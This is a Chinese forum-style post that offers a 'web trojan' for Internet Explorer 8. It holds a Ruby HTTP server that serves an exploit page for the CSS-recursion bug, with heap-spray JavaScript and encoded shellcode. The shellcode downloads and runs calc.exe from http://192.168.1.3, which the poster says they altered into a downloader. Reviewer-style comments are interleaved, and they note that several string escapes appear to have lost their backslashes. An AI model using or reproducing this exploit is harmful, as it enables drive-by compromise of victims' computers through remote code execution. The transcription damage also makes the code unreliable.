好用的过ie8的网马,重在技术研究

  原内容不是我发明的,我只是改了一下,改成下载的了

  #!/usr/bin/env ruby

  # Author: Nephi Johnson (d0c_s4vage)

  require 'socket'

  # Writes a single HTTP/1.1 response to +sock+ and echoes it line by line
  # to stdout.
  #
  # Header lines are joined with bare LF, exactly as the page shows (HTTP
  # proper wants CRLF). NOTE(review): Content-Length is String#length, i.e. a
  # character count; it equals the byte count only for ASCII-8BIT or
  # ASCII-only bodies.
  #
  # @param sock [#write] destination; anything responding to #write
  # @param data [String] response body (#to_s is taken)
  # @param opts [Hash] :code (default "200"), :message (default "OK"),
  #   :type (default "text/html")
  # @return [Boolean] true if the write succeeded, false if it raised a
  #   StandardError
  def http_send(sock, data, opts={})
    settings = {:code=>"200", :message=>"OK", :type=>"text/html"}.merge(opts)

    header_lines = [
      "HTTP/1.1 #{settings[:code]} #{settings[:message]}",
      "Date: Sat, 11 Dec 2010 14:20:23 GMT",
      "Cache-Control: no-cache",
      "Content-Type: #{settings[:type]}",
      "Pragma: no-cache",
      "Content-Length: #{data.length}"
    ]
    # Blank line terminates the header block, then the body follows verbatim.
    response = header_lines.join("\n") + "\n\n" + data.to_s

    puts "[+] Sending:"
    response.split("\n").each { |line| puts "    #{line}" }

    begin
      sock.write(response)
    rescue StandardError
      return false
    end
    true
  end

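  # Waits up to +timeout+ seconds for +sock+ to become readable, then reads at
  # most 1024 bytes into +out_str+ (String#replace, mutated in place) and
  # echoes them line by line to stdout.
  #
  # @param sock [BasicSocket] socket to read from
  # @param out_str [String] receives the received bytes (replaced in place)
  # @param timeout [Numeric] seconds to wait in Kernel.select
  # @return [Boolean] true when data was read; false on timeout (the socket is
  #   closed first) or when select/recv/close raised a StandardError
  def sock_read(sock, out_str, timeout=5)
    unless Kernel.select([sock], [], [], timeout)
      # Timed out: discard the connection and report failure to the caller.
      sock.close
      return false
    end

    out_str.replace(sock.recv(1024))
    puts "[+] Received:"
    out_str.split("\n").each { |line| puts "    #{line}" }
    # Explicit true instead of the (truthy) Array the original returned from #each.
    true
  rescue StandardError
    # Was `rescue Exception`, which also swallowed Interrupt and SystemExit, so
    # Ctrl-C during recv silently became "false". IOError and SystemCallError
    # are StandardErrors, so socket failures still yield false here.
    false
  end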

  # Prefixes every byte of +str+ with the literal text "x00".
  #
  # NOTE(review): the string escapes in this listing (here, and the "xfexff"
  # prefix used by the callers) appear to have lost their backslashes in
  # transcription; this reproduces the text exactly as shown.
  #
  # @param str [String] input, iterated byte by byte
  # @return [String] "x00" followed by the byte, concatenated for every byte
  def to_uni(str)
    str.each_byte.map { |byte| "x00#{byte.chr}" }.join
  end

  # Top-level instance variables (on main); the server loop at the bottom of
  # the script matches incoming GETs against @html_name and @css_name.
  # NOTE(review): @css_name's escape sequences appear stripped in
  # transcription, so the value shown here is plain ASCII text.
  @css_name = "x00sx03sx00sx03sx00sx03sx00sx03s"

  @html_name = "testxxx.html"

  # "a" repeated for half of @css_name's length. It is gsub!-ed out of the
  # to_uni-encoded heredocs further down and replaced by @css_name.
  placeholder = "a" * (@css_name.length/2)

  @html = <<-HTML

  <script>

  function dup_str(str, length) {

  var res = str;

  while(res.length < length) {

  res += res;

  }

  res = res.substr(res.length – length);

  return res;

  }

  function to_bin(str) {

  var res = "";

  while(str.length > 0) {

  var first = str.substr(0, 2);

  var second = str.substr(2, 2);

  res += "%u" + second + first;

  str = (str.length > 4) ? str.substr(4) : "";

  }

  return unescape(res);

  }

  // first heap spray

  var base = dup_str(to_bin("0c0c0c0900000008000000730073030100000000010000730073030c"), 512+6);

  var arr = []

  for(var i = 0; i < 60000; i++) {

  arr[i] = ["" + base].join("");

  }

  // second heap spray w/ shellcode

  var nops = dup_str(to_bin("0c0c0c0c"), 4096+6);

  // windows/exec – 200 bytes

  // http://www.myhack58.com

  // EXITFUNC=process, url=http://192.168.1.3/calc.exe

  var shellcode = unescape("%u10eb%u4a5a%uc933%ub966%u013c%u3480%u990a%ufae2%u05eb%uebe8%uffff%u70ff%u994c%u9999%ufdc3%ua938%u9999%u1299%u95d9%ue912%u3485%ud912%u1291%u1241%ua5ea%ued12%ue187%u6a9a%ue712%u9ab9%u1262%u8dd7%u74aa%ucecf%u12c8%u9aa6%u1262%uf36b%uc097%u3f6a%u91ed%uc6c0%u5e1a%udc9d%u707b%uc6c0%u12c7%u1254%ubddf%u5a9a%u7848%u589a%u50aa%u12ff%u1291%u85df%u5a9a%u7858%u9a9b%u1258%u9a99%u125a%u1263%u1a6e%u975f%u4912%u9df3%u71c0%u99c9%u9999%u5f1a%ucb94%u66cf%u65ce%u12c3%uf341%uc098%ua471%u9999%u1a99%u8a5f%udfcf%ua719%uec19%u1963%u19af%u1ac7%ub975%u4512%ub9f3%u66ca%u75ce%u9d5e%uc59a%ub7f8%u5efc%u9add%ue19d%u99fc%uaa99%uc959%ucac9%uc9cf%uce66%u1265%uc945%u66ca%u69ce%u66c9%u6dce%u59aa%u1c35%uec59%uc860%ucfcb%u66ca%uc34b%u32c0%u777b%u59aa%u715a%u66bf%u6666%ufcde%uc9ed%uf6eb%ud8fa%ufdfd%ufceb%ueaea%ude99%uedfc%ue0ca%uedea%uf4fc%uf0dd%ufceb%uedfa%uebf6%ud8e0%uce99%uf7f0%ue1dc%ufafc%udc99%uf0e1%ucded%uebf1%uf8fc%u99fd%uf6d5%ufdf8%uf0d5%uebfb%uebf8%ud8e0%uec99%uf5eb%uf6f4%u99f7%ucbcc%uddd5%ueef6%uf5f7%uf8f6%ucdfd%udff6%uf5f0%ud8fc%u6899%u7474%u3a70%u2f2f%u3931%u2e32%u3631%u2e38%u2e31%u2f33%u6163%u636c%u652e%u6578%u4180");

  var arr2 = [];

  for(var i = 0; i < 30000; i++) {

  arr2[i] = [nops + shellcode].join("");

  }

  // write the link to the stylesheet

  var link = document.createElement("link");

  link.setAttribute("rel", "Stylesheet");

  link.setAttribute("type", "text/css");

  link.setAttribute("href", "#{placeholder}")

  document.getElementsByTagName("head")[0].appendChild(link);

  </script>

  HTML

  # Prefix the page and run it through to_uni, then replace the encoded
  # placeholder (the href of the <link> element in the heredoc) with @css_name.
  @html = "xfexff" + to_uni(@html)

  @html.gsub!(to_uni(placeholder), @css_name)

  # aFile = File.new("C:\\1.txt","wb")

  #      aFile.puts @html

  #aFile.close

  # Stylesheet body: four @import lines, each naming the placeholder that is
  # replaced by @css_name below. The server loop serves it for the @css_name
  # request and, via its else branch, for any other GET.
  @css = <<-CSS

  @import url("#{placeholder}");

  @import url("#{placeholder}");

  @import url("#{placeholder}");

  @import url("#{placeholder}");

  CSS

  # Same prefix / to_uni / placeholder substitution as for @html.
  @css = "xfexff" + to_uni(@css)

  @css.gsub!(to_uni(placeholder), @css_name)

  # Served for GETs whose request text contains "index": one link to @html_name.
  @index = <<-INDEX

  <a href="#{@html_name}">#{@html_name}</a>

  INDEX

  # Single-threaded responder on TCP 55555. TCPServer.open with only a port
  # binds every interface, and nothing in this loop authenticates the client.
  # NOTE(review): `while true` is the non-idiomatic spelling of `loop do`.
  TCPServer.open(55555) do |srv|

  while true

  cli = srv.accept

  req = ""

  # html, css and index are assigned but never used in this loop.
  html = ""

  css = ""

  index = ""

  # First read, 5 s timeout. On false the connection is abandoned: sock_read
  # closes the socket on timeout, but NOTE(review): not when it rescued an
  # error, so that path may leave the descriptor open.
  next unless sock_read(cli, req, 5)

  # Each recv chunk (at most 1024 bytes) is dispatched on its own; the regexes
  # below are unanchored and match anywhere in the chunk.
  while req.length > 0

  if req =~ /GET/

  if req =~ /GET.*#{Regexp.escape(@html_name)}/

  break unless http_send(cli, @html, :type=>"text/html")

  elsif req =~ /GET.*index/

  break unless http_send(cli, @index)

  elsif req =~ /GET.*#{Regexp.escape(@css_name)}/

  break unless http_send(cli, @css, :type=>"text/css")

  else

  # Any other GET is answered with the stylesheet as well.
  break unless http_send(cli, @css, :type=>"text/css")

  end

  elsif req =~ /QUIT/

  # NOTE(review): any connected client can terminate the whole process by
  # sending a chunk containing "QUIT" — an unauthenticated remote shutdown.
  exit()

  end

  req = ""

  # `next` in a while loop re-tests the condition; req was just emptied, so a
  # failed read ends the inner loop and falls through to cli.close.
  next unless sock_read(cli, req, 5)

  end

  # The rescue modifier swallows whatever close raises.
  cli.close rescue next

  end

  end

 
